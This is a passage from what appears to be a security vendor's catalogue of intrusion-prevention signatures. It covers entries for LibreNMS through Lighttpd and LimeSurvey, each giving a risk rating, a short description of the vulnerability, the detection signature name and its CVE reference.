Description: A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation of user input when adding services to a device. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-LibreNMS-Device-Overview-Stored-Cross-Site-Scripting
References:
CVE-2024-50352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50352
Back to top

LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation of user input when configuring the port settings of a device. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199
References:
CVE-2025-23199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23199
Back to top

LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of input data in DeviceGroupController when processing the the Name parameter in the request causes a stored cross-site scripting vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting
References:
CVE-2022-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4069
Back to top

LibreNMS-Health-View-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of parameters in multiple modules of the health view feature causes a cross-site scripting vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-LibreNMS-Health-View-Reflected-Cross-Site-Scripting
References:
CVE-2023-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4347
Back to top

LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of notification titles in a request causes a cross-site scripting vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting
References:
CVE-2022-4067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4067
Back to top

LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1630-5242
Last changed: sgpkg-ips-1630-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation on HTTP requests in outages.inc.php. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.
Situation: HTTP_CRL-LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting
References:
CVE-2023-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4347
Back to top

LibreNMS-Packages.inc.php-Package-Name-SQL-Injection

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: An SQL injection vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation in packages.inc.php module on package name parameter in the request. A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CRL-LibreNMS-Packages.inc.php-Package-Name-SQL-Injection
References:
CVE-2024-32461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32461
Back to top

LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: High
First detected in: sgpkg-ips-1628-5242
Last changed: sgpkg-ips-1628-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation on HTTP requests in list.inc.php of Ports module. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.
Situation: HTTP_CRL-LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting
References:
CVE-2023-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4347
Back to top

LibreNMS-ServiceTemplateController.php-Name-Stored-CSS

About this vulnerability: An attempt to exploit a vulnerability in LibreNMS detected
Risk: High
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Platform: Linux
Software: LibreNMS
Type: Input Validation
Description: A vulnerability in LibreNMS, versions prior to 24.4.0, which allows remote attackers to execute arbitrary code in a victim's browser by seding a crafted HTTP request to the target server, due to insufficient input validation of the name parameter in the ServiceTemplateController.php module.
Situation: HTTP_CRL-LibreNMS-ServiceTemplateController.php-Name-Stored-CSS
References:
CVE-2024-32479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32479
Back to top

LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: High
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation in UserController.php module on username parameter in the request. A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in execution of arbitrary script code in the victim's browser.
Situation: HTTP_CS-LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting
References:
CVE-2022-4068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4068
Back to top

LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow

About this vulnerability: A vulnerability in Apache Software Foundation OpenOffice
Risk: Moderate
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Integer Overflow
Description: An insufficient size check in the parsing of PrinterData elements in ODF documents can be exploited by a crafted file. A successful exploit allows code execution on the affected machine.
Situation: File-TextId_LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow
References:
CVE-2015-5212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5212
Back to top

LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425

About this vulnerability: A vulnerability in LibreOffice LibreOffice
Risk: Moderate
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: LibreOffice
Type: Directory Traversal
Description: The lack of validation of font names included in a document causes a directory traversal vulnerability in LibreOffice. A successful exploitation allows an attacker to write files on the target system.
Situation: File-TextId_LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425
References:
CVE-2024-12425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12425
Back to top

LibreOffice-Hsqldb-Arbitrary-File-Write

About this vulnerability: A vulnerability in LibreOffice
Risk: Moderate
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Platform: Generic
Software: LibreOffice
Type: Malfunction
Description: Insecure handling of scripts in the HSQLDB database engine of LibreOffice causes an arbitrary file write vulnerability. A successful exploitation allows an attacker to write arbitrary files on the target system.
Situation: File-Text_LibreOffice-Hsqldb-Arbitrary-File-Write
References:
CVE-2023-1183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1183
Back to top

LibreOffice-Librelogo-Arbitrary-Code-Execution

About this vulnerability: A vulnerability in LibreOffice
Risk: Moderate
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibreOffice
Type: Input Validation
Description: There has been reported a remote code execution vulnerability in LibreOffice. This vulnerability could be exploited by opening a crafted office document. Successful exploitation could lead in arbitrary code execution.
Situation: File-TextId_LibreOffice-Librelogo-Arbitrary-Code-Execution
References:
CVE-2019-9848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9848
Back to top

LibreOffice-Macro-Event-Remote-Code-Execution

About this vulnerability: A vulnerability in LibreOffice
Risk: High
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibreOffice; Apache OpenOffice
Type: Input Validation
Description: A remote code execution vulnerability has been reported in LibreOffice. The vulnerability is due to insufficient validation of paths, and arguments when processing event-listeners in LibreOffice documents. A remote attacker could exploit the vulnerability by enticing a user to open a specially crafted office document. Successful exploitation could result in arbitrary code execution under the security context of the user.
Situation: File-TextId_LibreOffice-Macro-Event-Remote-Code-Execution
References:
CVE-2018-16858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16858
Back to top

LibreOffice-RTF-Parser-Use-After-Free

About this vulnerability: A vulnerability in LibreOffice LibreOffice
Risk: Moderate
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibreOffice
Type: Malfunction
Description: Improper parsing of RTF files in LibreOffice results in a use after free vulnerability. By means of a crafted file, an attacker can gain the ability to run arbitrary code on the target with the privileges of the current user.
Situation: File-RTF_LibreOffice-RTF-Parser-Use-After-Free
References:
CVE-2016-4324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4324
Back to top

LibreOffice-Webservice-Information-Disclosure

About this vulnerability: A vulnerability in LibreOffice
Risk: Moderate
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibreOffice
Type: Input Validation
Description: Improper validation of the WEBSERVICE() function argument causes an information disclosure vulnerability in LibreOffice. A successful exploit allows a remote attacker to read arbitrary files on the target system without authentication.
Situation: File-TextId_LibreOffice-Webservice-Information-Disclosure
References:
CVE-2018-6871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871
Back to top

Libsndfile-PAF-File-Integer-Overflow

About this vulnerability: An attempt to exploit vulnerability in the libsndfile library detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libsndfile
Type: Malfunction
Description: An integer overflow vulnerability exists in the Paris Audio Format (PAF) handler of the libsndfile library, which can result in a heap buffer overflow.
Situation: HTTP_SS-Libsndfile-PAF-File-Integer-Overflow
File-Binary_Libsndfile-PAF-File-Integer-Overflow
References:
CVE-2011-2696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2696
BID-48644
http://www.securityfocus.com/bid/48644
Back to top

Libspf2-Macro-Expansion-Integer-Underflow

About this vulnerability: A vulnerability in libspf2
Risk: High
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: libspf2
Type: Integer Overflow
Description: An integer underflow vulnerability has been reported for libspf2. The vulnerability is due to a lack of proper input validation when processing SPF macros. A remote unauthenticated attacker can exploit the vulnerability by sending an email from a domain configured with a crafted SPF record. Successfully exploiting this vulnerability could result in arbitrary code execution under the security context of the embedding application.
Situation: DNS-UDP_Libspf2-Macro-Expansion-Integer-Underflow
References:
CVE-2023-42118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42118
Back to top

Libtiff-Jbigdecode-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in libtiff libtiff
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libtiff
Type: Buffer Overflow
Description: Insufficient checks of JBIG-compressed data causes a heap-buffer overflow vulnerability in Libtiff. A successful exploit may allow an attacker to execute code on the target.
Situation: File-Binary_Libtiff-Jbigdecode-Heap-Buffer-Overflow
References:
CVE-2018-18557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18557
Back to top

Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in libtiff libtiff
Risk: Moderate
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: libtiff
Type: Malfunction
Description: Improper handling of TIFF files causes an out of bounds read vulnerability in libtiff. A successful exploit may allow an attacker to execute code with the privileges of the affected process.
Situation: File-Binary_Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read
Back to top

Libupnp-Device-Service-Name-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Linux SDK for UPnP libupnp
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: libupnp
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Intel SDK for UPnP and Portable SDK for UPnP. The vulnerability is due to a boundary error while parsing uuid:schemas:device service name strings in the unique_service_name() function called from SSDP protocol parser. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary code within the context of the vulnerable service, normally root.
Situation: Generic_UDP-Libupnp-Device-Service-Name-Stack-Buffer-Overflow
References:
CVE-2012-5958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5958
BID-57602
http://www.securityfocus.com/bid/57602
OSVDB-89611
http://www.osvdb.org/89611
Back to top

Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Linux SDK for UPnP libupnp
Risk: High
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libupnp
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Intel's SDK for UPnP and the Portable SDK for UPnP. The vulnerability is due to a boundary error while parsing UUID: service name URIs in the unique_service_name() function called from the SSDP protocol parser. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary code within the context of the vulnerable service, normally root.
Situation: Generic_UDP-Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow
References:
CVE-2012-5959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5959
BID-57602
http://www.securityfocus.com/bid/57602
OSVDB-89611
http://www.osvdb.org/89611
Back to top

Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Linux SDK for UPnP libupnp
Risk: Moderate
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libupnp
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Intel's SDK for UPnP and the Portable SDK for UPnP. The vulnerability is due to a boundary error while parsing ::upnp:rootdevice service name URIs in the unique_service_name() function called from the SSDP protocol parser. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary code within the context of the vulnerable service, normally root.
Situation: Generic_UDP-Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow
References:
CVE-2012-5960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5960
BID-57602
http://www.securityfocus.com/bid/57602
OSVDB-89611
http://www.osvdb.org/89611
Back to top

Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in libVNC LibVNCClient
Risk: High
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibVNCClient
Type: Buffer Overflow
Description: A heap based buffer overflow vulnerability in libVNC LibVNCClient, due to improper validation of data in CoRRE encodings, which allows remote attackers to execute remote code by sending a malicious RFB response to a client.
Situation: RFB_SS-Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow
References:
CVE-2018-20020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20020
Back to top

Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service

About this vulnerability: A vulnerability in LibVNCServer Development Team LibVNCServer
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: LibVNCServer
Type: Input Validation
Description: Improper handling of VNC traffic causes a didide-by-zero vulnerability in libVNCServer which can be exploited to cause a denial of service condition.
Situation: Generic_CS-Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service
References:
CVE-2020-25708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25708
Back to top

Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free

About this vulnerability: A vulnerability in LibVNCServer Development Team LibVNCServer
Risk: Moderate
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibVNCServer
Type: Malfunction
Description: Improper validation of a Tight file transfer request in the Tight File Transfer extension of LibVNCServer causes a use after free vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free
References:
CVE-2018-6307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6307
Back to top

Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in LibVNCServer Development Team LibVNCServer
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibVNCServer
Type: Buffer Overflow
Description: Improper validation of the file transfer request by the File Transfer extension causes a heap-based buffer overflow vulnerability in LibVNCServer. A successful exploit allows an attacker to execute code on the target system.
Situation: Generic_CS-Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow
References:
CVE-2018-15127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15127
Back to top

Libvncserver-LibvVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in LibVNCServer Development Team LibVNCServer
Risk: Moderate
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibVNCServer
Type: Buffer Overflow
Description: Improper handling of framebuffer update messages in libvncclient causes a heap buffer overflow vulnerability. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: RFB_SS-Libvncserver-LibVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow
References:
CVE-2016-9941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9941
Back to top

Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service

About this vulnerability: A vulnerability in LibVNCServer Development Team LibVNCServer
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibVNCServer
Type: Input Validation
Description: A denial of service vulnerability exists in LibVNCserver. The vulnerability is due to a division by zero when processing an rfbSetScale message. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted RFB message to the server. Successful exploitation could lead to a denial of service condition on the server.
Situation: RFB_CS-Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service
References:
CVE-2014-6054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6054
OSVDB-112013
http://www.osvdb.org/112013
Back to top

Libvpx-Heap-Buffer-Overflow-CVE-2023-5217

About this vulnerability: A vulnerability in libvpx
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: Chrome;Safari;Mozilla Firefox
Type: Malfunction
Description: A heap buffer overflow has been reported in vp8 encoding in libvpx. This issue affects multiple browsers that include libvpx older than 1.13.1, such as Chrome versions before 117.0.5938.132 and Mozilla Firefox versions before 118.0.1. A remote attacker could exploit this vulnerability via a maliciously crafted HTML document.
Situation: File-Text_Libvpx-Heap-Buffer-Overflow-CVE-2023-5217
References:
CVE-2023-5217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5217
Back to top

Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in LibYAML LibYAML
Risk: Moderate
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibYAML
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in LibYAML's scanner, a component of LibYAML's reading and parsing functions. This vulnerability is due to insufficient validation of percent encoded text in the URI of tags within YAML documents. A remote unauthenticated attacker can exploit this vulnerability by providing a specially crafted YAML document. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow
References:
CVE-2014-2525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2525
BID-66478
http://www.securityfocus.com/bid/66478
OSVDB-105027
http://www.osvdb.org/105027
Back to top

Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961

About this vulnerability: A vulnerability in Liferay Portal
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Liferay Portal
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Liferay Portal. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961
References:
CVE-2020-7961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7961
Back to top

Liferay-Portal-User-Account-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Liferay Liferay Portal
Risk: High
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Liferay Portal
Type: Input Validation
Description: There exists an XSS vulnerability in Liferay Portal. A remote, unauthenticated attacker could use this to inject arbitrary code into a user profile.
Situation: HTTP_CRL-Liferay-Portal-User-Account-Stored-Cross-Site-Scripting
References:
CVE-2016-3670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3670
Back to top

Lifesize-Room-Command-Execution

About this vulnerability: A Lifesize Room Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LifeSize Room
Type: Input Validation
Description: A vulnerability in LifeSize Room, versions 3.5.3 and 4.7.18, which allows remote attackers to execute arbitrary code via a modified request to the LSRoom_Remoting.doCommand function in gateway.php. This fingerprint also covers the known authentication vulnerability CVE-2011-2762.
Situation: HTTP_CRL-Lifesize-Room-Command-Execution
References:
CVE-2011-2763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2763
BID-49330
http://www.securityfocus.com/bid/49330
OSVDB-75212
http://www.osvdb.org/75212
Back to top

LightOpenCMS-Smarty.php-Local-File-Inclusion

About this vulnerability: A vulnerability in LightOpenCMS
Risk: Moderate
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: LightOpenCMS
Type: Malfunction
Description: A local file inclusion vulnerability has been reported in LightOpenCMS 0.1.
Situation: File-Text_LightOpenCMS-Smarty.php-Local-File-Inclusion
References:
CVE-2009-2223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2223
Back to top

Lighttpd-Connection-Header-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in Lighttpd Project Lighttpd
Risk: High
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lighttpd
Type: Infinite Loop
Description: A denial-of-service vulnerability exists in lighttpd. The vulnerability is caused by an infinite loop while parsing malformed HTTP Connection headers. By sending a crafted request, a remote attacker can exploit this vulnerability to create a complete denial of service condition of the vulnerable service.
Situation: HTTP_CSH-Lighttpd-Connection-Header-Parsing-Denial-Of-Service
References:
CVE-2012-5533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5533
BID-56619
http://www.securityfocus.com/bid/56619
OSVDB-87623
http://www.osvdb.org/87623
Back to top

Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service

About this vulnerability: A vulnerability in Lighttpd.
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: Lighttpd
Type: Malfunction
Description: A vulnerability in Lighttpd, versions 1.4.56, 1.4.57, and 1.4.58, which allows remote attackers to create a denial of service condition by sending crafted requests to the target server, due to insufficient handling of oversized header requests read across multiple calls.
Situation: HTTP_CSU-Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service
References:
CVE-2022-30780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30780
Back to top

Lighttpd-Host-Header-Mod_mysql_vhost-SQL-Injection

About this vulnerability: A vulnerability in Lighttpd Project Lighttpd
Risk: Moderate
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lighttpd
Type: SQL Injection
Description: A SQL injection vulnerability exists in Lighttpd Web Server. The vulnerability is due to insufficient sanitization of user supplied input in the Host header field of a request. When the mod_mysql_vhost module is enabled, the Host header field data can be used to manipulate SQL queries. A remote unauthenticated attacker could exploit this vulnerability by placing specially crafted data in the Host header field of a request. Successful exploitation could allow an attacker to execute arbitrary SQL queries.
Situation: HTTP_CSH-Lighttpd-Host-Header-Multiple-Vulnerabilities
References:
CVE-2014-2323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323
OSVDB-104381
http://www.osvdb.org/104381
Back to top

Lighttpd-Host-Header-Mod_Simple_vhost-Directory-Traversal

About this vulnerability: A vulnerability in Lighttpd Project Lighttpd
Risk: Moderate
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lighttpd
Type: Directory Traversal
Description: An information disclosure vulnerability exists in Lighttpd Web Server. The vulnerability is due to insufficient sanitization of user supplied input in the Host header field of a request. When the mod_simple_vhost module is enabled, the Host header field data can be used to cause directory traversal. A remote unauthenticated attacker could exploit this vulnerability by placing specially crafted data in the Host header field of a request. Successful exploitation could allow an attacker to download sensitive files.
Situation: HTTP_CSH-Lighttpd-Host-Header-Multiple-Vulnerabilities
References:
CVE-2014-2324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324
BID-66157
http://www.securityfocus.com/bid/66157
OSVDB-104382
http://www.osvdb.org/104382
Back to top

Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service

About this vulnerability: A vulnerability in Lighttpd Project Lighttpd
Risk: Moderate
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: Lighttpd
Type: Buffer Overflow
Description: Improper handling of user-sent input in mod_extforward plugin causes a denial of service vulnerability in Lighttpd.
Situation: HTTP_CSH-Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service
References:
CVE-2022-22707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22707
Back to top

Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability

About this vulnerability: A vulnerability in Lighttpd Project Lighttpd
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lighttpd
Type: Input Validation
Description: A variable overwriting vulnerability exists in Lighttpd FastCGI extension.
Situation: HTTP_CS-Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability
References:
CVE-2007-4727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4727
BID-25622
http://www.securityfocus.com/bid/25622
Back to top

Lighttpd-Url-Path-2f-Decode-Denial-Of-Service

About this vulnerability: A vulnerability in Lighttpd Project Lighttpd
Risk: Moderate
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lighttpd
Type: Input Validation
Description: Improper handling of URLs containing encoded / characters causes a vulnerability in Lighttpd. A successful exploit allows an attacker to cause a denial of service condition.
Situation: HTTP_CSU-Lighttpd-Url-Path-2f-Decode-Denial-Of-Service
References:
CVE-2019-11072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11072
Back to top

LimeSurvey-Zip-Path-Traversals

About this vulnerability: A vulnerability in LimeSurvey.
Risk: High
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Platform: Generic
Software: LimeSurvey
Type: Directory Traversal
Description: A vulnerability in LimeSurvey, versions 4.1.11-200316, 3.15.0-181008, 3.9.0-180604, 3.6.0-180328, 3.0.0-171222, and 2.70.0-170921, which allows remote attackers to download arbitrary files via a path traversal.
Situation: HTTP_CS-LimeSurvey-Zip-Path-Traversals
References:
CVE-2020-11455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11455
Back to top

Limewire-Peer-To-Peer-Network-Usage

About this vulnerability: Limewire peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Limewire
Type: Peer-to-Peer
Description: Limewire is a peer-to-peer network that can be used to share files. File sharing can be a security risk if confidential files are shared unintentionally or files that contain malicious content such as viruses, worms, or backdoors are downloaded.
Situation: P2P-TCP_Limewire-Tls-Network-Connect
HTTP_CSH-Limewire-User-Agent
Back to top

Linear-eMerge-E3-Series-Access-Controller-Command-Injection

